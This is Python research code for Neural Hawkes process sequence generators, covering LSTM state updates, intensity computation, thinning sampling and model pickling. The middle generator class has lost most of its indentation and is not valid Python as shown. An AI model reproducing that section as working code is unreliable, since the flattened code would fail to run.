        # ints; bytearray yields ints on both Python 2 and Python 3.
        str_input = ''.join(
            format(byte, '08b')
            for byte in bytearray(struct.pack('!f', float32_input))
        )
        bit_input = numpy.zeros(
            (self.dim_float,), dtype=dtype
        )
        assert(self.dim_float == len(str_input))
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    def sigmoid(self, x):
        # logistic function 1 / (1 + exp(-x))
        return 1 / (1+numpy.exp(-x))
    #
    def compute_hidden_states(self):
        """Advance the LSTM one step, consuming the type and inter-event
        time of the last event in self.one_seq; updates self.hidden_t and
        self.cell_t in place."""
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        # time representation: thresholded features plus the raw dt
        # ([None] promotes the float32 scalar to a 1-element array)
        time_rep_t = self.hard_relu(
            self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
        )
        time_rep_t = numpy.concatenate(
            (
                time_rep_t,
                self.one_seq[-1][
                    'time_since_last_event'
                ][None]
            ), axis = 0
        )
        emb_time_t = numpy.dot(
            time_rep_t, self.Emb_time
        )
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        # the 4*dim_model pre-activations are split into the LSTM gates
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    def compute_intensity_given_past(self, time_current):
        """Compute self.intensity at time_current given the history."""
        time_recent = self.one_seq[-1]['time_since_start']
        delta = self.soft_relu(
            numpy.tensordot(
                self.hidden_t, self.W_delta, (0, 0)
            )
        )
        # hidden state decayed since the last event,
        # shape (dim_model, dim_process)
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        # excitation plus the adaptive base rate dot(hidden_t, W_mu)
        self.intensity_tilde = numpy.sum(
            self.W_alpha * hidden_with_time,
            axis = 0
        ) + numpy.dot(
            self.hidden_t, self.W_mu
        )
        self.intensity = self.soft_relu(
            self.intensity_tilde
        )
    #
    def compute_intensity_upper_bound(self, time_current):
        """Compute self.intensity_ub, an upper bound of the intensity for
        t >= time_current. The base-rate term dot(hidden_t, W_mu) is
        time-invariant, so it is added without rectification."""
        time_recent = self.one_seq[-1]['time_since_start']
        delta = self.soft_relu(
            numpy.tensordot(
                self.hidden_t, self.W_delta, (0, 0)
            )
        )
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t[:, None]
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(
                self.W_alpha * hidden_with_time
            ),
            axis = 0
        ) + numpy.dot(
            self.hidden_t, self.W_mu
        )
        self.intensity_ub = self.soft_relu(
            self.intensity_tilde_ub
        )
    #
    def sample_time_given_type(self, type_event):
        """Sample the next occurrence time of type_event via adaptive
        thinning: after each rejection the upper bound is recomputed at
        the advanced time, tightening the proposal rate."""
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        u = 1.5  # > 1.0 so the loop body runs at least once
        while u >= 1.0:
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            u = U * intensity_hazard / self.intensity[type_event]
            # adaptive step: refresh the (decreasing) upper bound at the
            # new candidate time to make the sampling quicker
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
        return time_current
    #
    def gen_one_seq(self, max_len):
        """Generate one sequence of max_len events by thinning: sample a
        candidate time per event type and keep the earliest."""
        self.restart_sequence()
        '''
        Liiniger (2009), p. 28, describes a "thinning algorithm":
        generate one event of each type, take the minimum,
        and discard the others.
        Details found in my paper write-up
        #
        max_len is a pre-sampled value to set the length of seq
        '''
        time_since_start = numpy.float32(0.0)
        # timestamp of the last occurrence of each type
        time_since_start_each_event = numpy.zeros(
            (self.dim_process,), dtype=dtype
        )
        for idx_event in range(max_len):
            time_of_happen = numpy.zeros(
                (self.dim_process,), dtype=dtype
            )
            # compute the hidden states of the most recent event
            self.compute_hidden_states()
            for type_event in range(self.dim_process):
                # sample one event using "thinning algorithm"
                time_of_happen[type_event] = numpy.copy(
                    self.sample_time_given_type(
                        type_event
                    )
                )
            # the earliest candidate becomes the next event
            time_since_start_new = numpy.min(time_of_happen)
            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        # throw away the BOS item at the head of the sequence
        self.one_seq.pop(0)
    #
    def gen_seqs(self, settings):
        """Generate settings['num_seqs'] sequences with lengths drawn
        uniformly from [min_len, max_len]; stored in self.list_seqs."""
        print("generating sequences ... ")
        num_seqs = settings['num_seqs']
        self.list_seqs = []
        cnt_seqs = 0
        while cnt_seqs < num_seqs:
            max_len = numpy.int32(
                round(
                    numpy.random.uniform(
                        low=settings['min_len'],
                        high=settings['max_len']
                    )
                )
            )
            self.gen_one_seq(max_len)
            self.list_seqs.append(self.one_seq)
            cnt_seqs += 1
            # progress report every 10 sequences
            if cnt_seqs % 10 == 9:
                print("idx seq of gen : ", (cnt_seqs, self.name))
                print("total number of seqs : ", num_seqs)
    #
    def print_some(self):
        """Print event types, absolute times, inter-event times, and
        (type, dt) pairs for the first 10 generated sequences."""
        print("printing some seqs ... ")
        for idx_seq in range(10):
            print("the id of this seq is : ", idx_seq)
            seq = self.list_seqs[idx_seq]
            list_events = []
            list_time = []
            list_dtime = []
            list_items = []
            for event_item in seq:
                list_events.append(event_item['type_event'])
                list_time.append(
                    round(event_item['time_since_start'], 4)
                )
                list_dtime.append(
                    round(event_item['time_since_last_event'], 4)
                )
                list_items.append(
                    (
                        event_item['type_event'],
                        round(
                            event_item['time_since_last_event'], 4
                        )
                    )
                )
            print("the events, time and diff time for : ", idx_seq)
            print(list_events)
            print(list_time)
            print(list_dtime)
            print("the list of items is : ")
            print(list_items)
    #
    def save_seqs(self, file_save):
        """Pickle the generated sequences to file_save."""
        with open(file_save, 'wb') as f:
            pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale(object):
'''
here is the sequence generator using Neural Hawkes process
'''
def __init__(self, settings):
#
print("initializing generator ... ")
self.args = settings['args']
self.dim_float = numpy.int32(32)
if settings['path_pre_train'] == None:
print("random parameters ... ")
self.dim_process = settings['dim_process']
self.dim_model = settings['dim_LSTM']
self.dim_time = self.dim_float
#
numpy.random.seed(
settings['seed_random']
)
#
#self.scale = numpy.float32(
# numpy.random.uniform(
# low = 1e-3, high = 2.0,
# size = (self.dim_process, )
# )
#)
self.scale = numpy.float32(
numpy.ones( (self.dim_process, ) )
)
#
self.W_mu = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size = (
self.dim_model, self.dim_process
)
)
)
#
self.W_delta = numpy.float32(
numpy.random.uniform(
low = -1.0, high = 1.0,
size=(
self.dim_model, self.dim_model,
self.dim_process
)
)
)
#
self.W_alpha = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (self.dim_model, self.dim_process)
)
)
self.Emb_event = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_process + numpy.int32(1),
self.dim_model
)
)
)
self.Emb_time = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
self.dim_time+numpy.int32(1),
self.dim_model
)
)
)
self.Threshold_time = numpy.float32(
numpy.random.uniform(
low = 0.0, high = 1.0,
size = (self.dim_time, )
)
)
self.W_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (
3 * self.dim_model,
4 * self.dim_model
)
)
)
self.b_recur = numpy.float32(
numpy.random.uniform(
low = -1.0,
high = 1.0,
size = (4*self.dim_model, )
)
)
else:
print("read pretrained model ... ")
path_pre_train = os.path.abspath(
settings['path_pre_train']
)
with open(path_pre_train, 'rb') as f:
model_pre_train = pickle.load(f)
self.dim_process = model_pre_train['dim_process']
self.dim_model = model_pre_train['dim_model']
self.dim_time = model_pre_train['dim_time']
#
self.scale = model_pre_train['scale']
self.W_mu = model_pre_train['W_mu']
self.W_delta = model_pre_train['W_delta']
self.W_alpha = model_pre_train['W_alpha']
self.Emb_event = model_pre_train['Emb_event']
self.Emb_time = model_pre_train['Emb_time']
self.Threshold_time = model_pre_train['Threshold_time']
self.W_recur = model_pre_train['W_recur']
self.b_recur = model_pre_train['b_recur']
#
#
#self.intensity = numpy.copy(self.mu)
self.name = 'AdaptiveNeuralHawkesGen_time_scale'
#
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
# initialization for LSTM states
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
print("initialization done ")
#
#
def soft_relu(self, x):
return numpy.log(numpy.float32(1.0)+numpy.exp(x))
#
def soft_relu_scale(self, x):
# last dim of x is dim_process
x /= self.scale
y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
y *= self.scale
return y
#
def hard_relu(self, x):
return numpy.float32(0.5) * (x + numpy.abs(x) )
#
#
def save_model(self, file_save):
print("saving model of generator ... ")
model_dict = {
'scale': numpy.copy(self.scale),
'W_mu': numpy.copy(self.W_mu),
'W_delta': numpy.copy(self.W_delta),
'W_alpha': numpy.copy(self.W_alpha),
'Emb_event': numpy.copy(self.Emb_event),
'Emb_time': numpy.copy(self.Emb_time),
'Threshold_time': numpy.copy(self.Threshold_time),
'W_recur': numpy.copy(self.W_recur),
'b_recur': numpy.copy(self.b_recur),
'dim_process': self.dim_process,
'dim_model': self.dim_model,
'dim_time': self.dim_time,
'dim_float': self.dim_float,
'name': self.name,
'args': self.args
}
with open(file_save, 'wb') as f:
pickle.dump(model_dict, f)
#
def restart_sequence(self):
# clear the events memory and reset starting time is 0
self.intensity_tilde = None
self.intensity = None
#
self.intensity_tilde_ub = None
self.intensity_ub = None
#
self.one_seq = []
#
self.one_seq.append(
{
'idx_event': numpy.int32(0),
'type_event': self.dim_process,
'time_since_start': numpy.float32(0.0),
'time_since_last_event': numpy.float32(0.0),
'time_since_last_same_event': numpy.float32(0.0)
}
)
self.hidden_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
self.cell_t = numpy.zeros(
(self.dim_model, ), dtype = dtype
)
#self.flag_continue = True
self.cnt_total_event = numpy.int32(len(self.one_seq))
#
#
#
#
def float32_to_bit(self, float_input):
'''
input a number in float, convert it to float32
get its 32-bit representations
'''
float32_input = numpy.float32(float_input)
str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
bit_input = numpy.zeros(
(self.dim_float,), dtype=dtype
)
assert(self.dim_float == len(str_input))
for idx, item_in_input in enumerate(str_input):
bit_input[idx] = numpy.float32(item_in_input)
return numpy.copy(bit_input)
#
#
def sigmoid(self, x):
return 1 / (1+numpy.exp(-x))
#
#
    def compute_hidden_states(self):
        # Advance the LSTM by one step, consuming the most recent event
        # in self.one_seq (generated at t_(rec(t))): embed its type and
        # its inter-event time, run the recurrence, and update
        # self.hidden_t / self.cell_t in place.
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        #
        # time representation: hard_relu(dt - Threshold_time) features,
        # concatenated with the raw dt itself ([None] promotes the
        # float32 scalar to a 1-element array for concatenate)
        time_rep_t = self.hard_relu(
            self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
        )
        time_rep_t = numpy.concatenate(
            (
                time_rep_t,
                self.one_seq[-1][
                    'time_since_last_event'
                ][None]
            ), axis = 0
        )
        emb_time_t = numpy.dot(
            time_rep_t, self.Emb_time
        )
        #
        # single affine transform producing all 4*dim_model gate
        # pre-activations from [event emb; time emb; previous hidden]
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        #
        # slice the pre-activations into the standard LSTM gates
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        #
        # standard LSTM cell/hidden update
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
#
#
#
def compute_intensity_given_past(self, time_current):
# compute the intensity of current time
# given the past events
#
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde = numpy.sum(
self.W_alpha * hidden_with_time,
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
#
self.intensity = self.soft_relu_scale(
self.intensity_tilde
)
# intensity computation is finished
#
def compute_intensity_upper_bound(self, time_current):
# compute the upper bound of intensity
# at the current time
time_recent = self.one_seq[-1]['time_since_start']
#
delta = self.soft_relu(
numpy.tensordot(
self.hidden_t, self.W_delta, (0, 0)
)
)
#
hidden_with_time = numpy.exp(
-delta * (
time_current - time_recent
)
) * self.hidden_t[:, None]
# (self.dim_model, self.dim_process)
# self.W_alpha (self.dim_model, self.dim_process)
self.intensity_tilde_ub = numpy.sum(
self.hard_relu(
self.W_alpha * hidden_with_time
),
axis = 0
) + numpy.dot(
self.hidden_t, self.W_mu
)
# this part is time-invariant so
# we do not need to take its hard_relu
#self.hard_relu(
# numpy.dot(
# self.hidden_t, self.W_mu
# )
#)
#
self.intensity_ub = self.soft_relu_scale(
self.intensity_tilde_ub
)
# intensity computation is finished
#
#
    def sample_time_given_type(self, type_event):
        # type_event is the type of event for which we want to sample the time
        # it is the little k in our model formulation in paper
        #
        # Thinning (rejection) sampling: propose Exp(bound) waiting
        # times and accept a candidate with probability
        # intensity / bound. The bound here is computed once at the last
        # event time (the adaptive refresh is disabled below).
        time_current = numpy.float32(0.0)
        if len(self.one_seq) > 0:
            time_current = self.one_seq[-1]['time_since_start']
        #
        #self.compute_intensity(time_current)
        self.compute_intensity_upper_bound(time_current)
        intensity_hazard = numpy.copy(
            self.intensity_ub[type_event]
        )
        #
        u = 1.5  # any value >= 1.0 forces at least one proposal
        while u >= 1.0:
            #print("type is : ", type_event)
            E = numpy.random.exponential(
                scale=1.0, size=None
            )
            U = numpy.random.uniform(
                low=0.0, high=1.0, size=None
            )
            #print("E U time_current : ")
            #print(E, U, time_current)
            #print("intensity hazard is : ")
            #print(intensity_hazard)
            # advance the candidate time by an Exp(bound) waiting time
            time_current += (E / intensity_hazard)
            self.compute_intensity_given_past(time_current)
            # accept when U < intensity / bound, i.e. u < 1.0
            u = U * intensity_hazard / self.intensity[type_event]
            #print("new time_current and u : ")
            #print(time_current, u)
            #print("intensity and upper bound is : ")
            #print(self.intensity)
            #print(self.intensity_ub)
            # use adaptive thinning algorithm
            # that is, decreasing the upper bound
            # to make the sampling quicker
            # use adaptive method by
            # toggling on the following block
            # (NOTE: the triple-quoted block below is a deliberately
            # disabled no-op string, kept as a toggle)
            '''
            self.compute_intensity_upper_bound(
                time_current
            )
            intensity_hazard = numpy.copy(
                self.intensity_ub[type_event]
            )
            '''
        return time_current
#
#
#
def gen_one_seq(self, max_len):
self.restart_sequence()
'''
Liiniger (2009), p. 28, describes a "thinning algorithm":
generate one event of each type, take the minimum,
and discard the others.
Details found in my paper write-up
max_len is a pre-sampled value to set the length of seq
'''
# initialize the seq
time_since_start = numpy.float32(0.0)
time_since_start_each_event = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
for idx_event in range(max_len):
time_of_happen = numpy.zeros(
(self.dim_process,), dtype=dtype
)
#
# compute the hidden states
# of the most recent event in sequence
self.compute_hidden_states()
#
for type_event in range(self.dim_process):
# sample one event using "thinning algorithm"
time_of_happen[type_event] = numpy.copy(
self.sample_time_given_type(
type_event
)
)
#
time_since_start_new = numpy.min(time_of_happen)
type_event_new = numpy.argmin(time_of_happen)
self.cnt_total_event += 1
#
# update sequence
time_since_last_event = time_since_start_new - time_since_start
time_since_start = time_since_start_new
time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
time_since_start_each_event[type_event_new] = time_since_start
self.one_seq.append(
{
'idx_event': self.cnt_total_event,
'type_event': type_event_new,
'time_since_start': time_since_start,
'time_since_last_event': time_since_last_event,
'time_since_last_same_event': time_since_last_same_event
}
)
#
# throw away the BOS item
# at the head of the sequence
self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
class NeuralHawkesAdaptiveBaseGen_time_scale_reduce(
    object
):
    '''
    Sequence generator for a Neural Hawkes process with a *reduced*
    decay parameter: W_delta is (dim_model, dim_model), so the hidden
    state decay is per hidden unit and shared across event types
    (contrast with the per-type tensordot variant above).
    Parameters are either drawn at random or loaded from a pickled
    pre-trained model.
    '''
    def __init__(self, settings):
        # settings keys used: 'args', 'path_pre_train', and (for random
        # init) 'dim_process', 'dim_LSTM', 'seed_random'.
        print("initializing generator ... ")
        self.args = settings['args']
        # number of bits used by float32_to_bit; also fixes dim_time
        self.dim_float = numpy.int32(32)
        if settings['path_pre_train'] == None:
            print("random parameters ... ")
            self.dim_process = settings['dim_process']
            self.dim_model = settings['dim_LSTM']
            self.dim_time = self.dim_float
            #
            numpy.random.seed(
                settings['seed_random']
            )
            #
            #self.scale = numpy.float32(
            #    numpy.random.uniform(
            #        low = 1e-3, high = 2.0,
            #        size = (self.dim_process, )
            #    )
            #)
            # per-type scale for soft_relu_scale; fixed to ones here
            self.scale = numpy.float32(
                numpy.ones( (self.dim_process, ) )
            )
            # base-rate weights: intensity offset per event type
            self.W_mu = numpy.float32(
                numpy.random.uniform(
                    low = -1.0, high = 1.0,
                    size = (
                        self.dim_model, self.dim_process
                    )
                )
            )
            # decay weights (dim_model x dim_model) -- the "reduced" param
            self.W_delta = numpy.float32(
                numpy.random.uniform(
                    low = -1.0, high = 1.0,
                    size=(
                        self.dim_model,
                        self.dim_model
                    )
                )
            )
            # excitation weights mapping hidden state to per-type intensity
            self.W_alpha = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (self.dim_model, self.dim_process)
                )
            )
            # +1 row for the BOS pseudo-event (type index == dim_process)
            self.Emb_event = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        self.dim_process + numpy.int32(1),
                        self.dim_model
                    )
                )
            )
            # +1 row: raw elapsed time is appended to the thresholded rep
            self.Emb_time = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        self.dim_time+numpy.int32(1),
                        self.dim_model
                    )
                )
            )
            self.Threshold_time = numpy.float32(
                numpy.random.uniform(
                    low = 0.0, high = 1.0,
                    size = (self.dim_time, )
                )
            )
            # LSTM weights: input is [event emb; time emb; hidden] (3*dim),
            # output is the 4 gates stacked (4*dim)
            self.W_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (
                        3 * self.dim_model,
                        4 * self.dim_model
                    )
                )
            )
            self.b_recur = numpy.float32(
                numpy.random.uniform(
                    low = -1.0,
                    high = 1.0,
                    size = (4*self.dim_model, )
                )
            )
        else:
            print("read pretrained model ... ")
            path_pre_train = os.path.abspath(
                settings['path_pre_train']
            )
            with open(path_pre_train, 'rb') as f:
                model_pre_train = pickle.load(f)
            self.dim_process = model_pre_train['dim_process']
            self.dim_model = model_pre_train['dim_model']
            self.dim_time = model_pre_train['dim_time']
            #
            self.scale = model_pre_train['scale']
            self.W_mu = model_pre_train['W_mu']
            self.W_delta = model_pre_train['W_delta']
            self.W_alpha = model_pre_train['W_alpha']
            self.Emb_event = model_pre_train['Emb_event']
            self.Emb_time = model_pre_train['Emb_time']
            self.Threshold_time = model_pre_train['Threshold_time']
            self.W_recur = model_pre_train['W_recur']
            self.b_recur = model_pre_train['b_recur']
        #
        #
        #self.intensity = numpy.copy(self.mu)
        self.name = 'AdaptiveNeuralHawkesGen_time_scale_reduce'
        #
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        # BOS placeholder event so the LSTM has something to condition on;
        # its type index (== dim_process) selects the extra Emb_event row
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq) )
        print("initialization done ")
    #
    #
    def soft_relu(self, x):
        # softplus log(1 + e^x): smooth, strictly positive.
        # NOTE(review): numpy.exp(x) overflows for large x;
        # numpy.logaddexp(0, x) would be the stable form -- confirm
        # before changing, since generated data depends on it.
        return numpy.log(numpy.float32(1.0)+numpy.exp(x))
    #
    def soft_relu_scale(self, x):
        # scaled softplus: s * log(1 + exp(x / s)), elementwise;
        # last dim of x is dim_process.
        # NOTE(review): `x /= self.scale` mutates the caller's array in
        # place, so e.g. self.intensity_tilde is left divided by scale
        # after this call -- verify that side effect is intended.
        x /= self.scale
        y = numpy.log(numpy.float32(1.0)+numpy.exp(x))
        y *= self.scale
        return y
    #
    def hard_relu(self, x):
        # elementwise max(x, 0), written as 0.5 * (x + |x|)
        return numpy.float32(0.5) * (x + numpy.abs(x) )
    #
    #
    def save_model(self, file_save):
        '''
        Pickle all parameters and dimensions to `file_save`, in the
        layout expected by __init__'s path_pre_train branch.
        '''
        print("saving model of generator ... ")
        model_dict = {
            'scale': numpy.copy(self.scale),
            'W_mu': numpy.copy(self.W_mu),
            'W_delta': numpy.copy(self.W_delta),
            'W_alpha': numpy.copy(self.W_alpha),
            'Emb_event': numpy.copy(self.Emb_event),
            'Emb_time': numpy.copy(self.Emb_time),
            'Threshold_time': numpy.copy(self.Threshold_time),
            'W_recur': numpy.copy(self.W_recur),
            'b_recur': numpy.copy(self.b_recur),
            'dim_process': self.dim_process,
            'dim_model': self.dim_model,
            'dim_time': self.dim_time,
            'dim_float': self.dim_float,
            'name': self.name,
            'args': self.args
        }
        with open(file_save, 'wb') as f:
            pickle.dump(model_dict, f)
    #
    def restart_sequence(self):
        '''
        Clear cached intensities, reset the event list to a single BOS
        placeholder, and zero the LSTM hidden/cell states; the starting
        time is 0.
        '''
        self.intensity_tilde = None
        self.intensity = None
        #
        self.intensity_tilde_ub = None
        self.intensity_ub = None
        #
        self.one_seq = []
        #
        self.one_seq.append(
            {
                'idx_event': numpy.int32(0),
                'type_event': self.dim_process,
                'time_since_start': numpy.float32(0.0),
                'time_since_last_event': numpy.float32(0.0),
                'time_since_last_same_event': numpy.float32(0.0)
            }
        )
        self.hidden_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        self.cell_t = numpy.zeros(
            (self.dim_model, ), dtype = dtype
        )
        #self.flag_continue = True
        self.cnt_total_event = numpy.int32(len(self.one_seq))
    #
    #
    #
    #
    def float32_to_bit(self, float_input):
        '''
        Convert the input to float32 and return its 32-bit IEEE-754
        representation as a vector of 0.0/1.0 floats.
        '''
        # NOTE(review): `ord(c)` assumes struct.pack yields 1-char
        # strings (Python 2); on Python 3 iterating bytes yields ints
        # and ord() raises TypeError -- confirm the target runtime.
        float32_input = numpy.float32(float_input)
        str_input = ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', float32_input))
        bit_input = numpy.zeros(
            (self.dim_float,), dtype=dtype
        )
        assert(self.dim_float == len(str_input))
        for idx, item_in_input in enumerate(str_input):
            bit_input[idx] = numpy.float32(item_in_input)
        return numpy.copy(bit_input)
    #
    #
    def sigmoid(self, x):
        # logistic function 1 / (1 + e^-x)
        return 1 / (1+numpy.exp(-x))
    #
    #
    def compute_hidden_states(self):
        '''
        Run one LSTM step on the most recent event in self.one_seq
        (generated at t_(rec(t))), updating self.hidden_t / self.cell_t
        in place.
        '''
        emb_event_t = self.Emb_event[
            self.one_seq[-1]['type_event'], :
        ]
        # thresholded time features, plus the raw elapsed time appended
        time_rep_t = self.hard_relu(
            self.one_seq[-1]['time_since_last_event'] - self.Threshold_time
        )
        time_rep_t = numpy.concatenate(
            (
                time_rep_t,
                self.one_seq[-1][
                    'time_since_last_event'
                ][None]
            ), axis = 0
        )
        emb_time_t = numpy.dot(
            time_rep_t, self.Emb_time
        )
        # single matmul producing all four gate pre-activations
        post_transform = numpy.dot(
            numpy.concatenate(
                (emb_event_t, emb_time_t, self.hidden_t),
                axis = 0
            ),
            self.W_recur
        ) + self.b_recur
        #
        gate_input = self.sigmoid(
            post_transform[:self.dim_model]
        )
        gate_forget = self.sigmoid(
            post_transform[self.dim_model:2*self.dim_model]
        )
        gate_output = self.sigmoid(
            post_transform[2*self.dim_model:3*self.dim_model]
        )
        gate_pre_c = numpy.tanh(
            post_transform[3*self.dim_model:]
        )
        # standard LSTM cell/hidden update
        cell_t_new = gate_forget * self.cell_t + gate_input * gate_pre_c
        hidden_t_new = gate_output * numpy.tanh(cell_t_new)
        self.hidden_t = numpy.copy(hidden_t_new)
        self.cell_t = numpy.copy(cell_t_new)
    #
    #
    #
    def compute_intensity_given_past(self, time_current):
        '''
        Set self.intensity_tilde / self.intensity to the intensity of
        every event type at time_current, given the events so far.
        '''
        time_recent = self.one_seq[-1]['time_since_start']
        # W_delta : dim_model * dim_model
        delta = self.soft_relu(
            numpy.dot(
                self.hidden_t, self.W_delta
            )
        )
        # (dim_model,): hidden state decayed since the last event
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t
        # self.W_alpha (self.dim_model, self.dim_process)
        self.intensity_tilde = numpy.dot(
            hidden_with_time, self.W_alpha
        ) + numpy.dot(
            self.hidden_t, self.W_mu
        )
        #
        self.intensity = self.soft_relu_scale(
            self.intensity_tilde
        )
        # intensity computation is finished
    #
    #
    def compute_intensity_upper_bound(self, time_current):
        '''
        Set self.intensity_tilde_ub / self.intensity_ub to an upper
        bound of the intensity at all times >= time_current, used as
        the hazard rate in the thinning sampler.
        '''
        time_recent = self.one_seq[-1]['time_since_start']
        #
        delta = self.soft_relu(
            numpy.dot(
                self.hidden_t, self.W_delta
            )
        )
        #
        hidden_with_time = numpy.exp(
            -delta * (
                time_current - time_recent
            )
        ) * self.hidden_t
        # hidden_with_time : dim_model
        # positive terms only decay, negative terms only rise toward 0,
        # so clipping each at zero (hard_relu) yields a valid bound
        self.intensity_tilde_ub = numpy.sum(
            self.hard_relu(
                self.W_alpha * hidden_with_time[:, None]
            ),
            axis = 0
        ) + numpy.dot(
            self.hidden_t, self.W_mu
        )
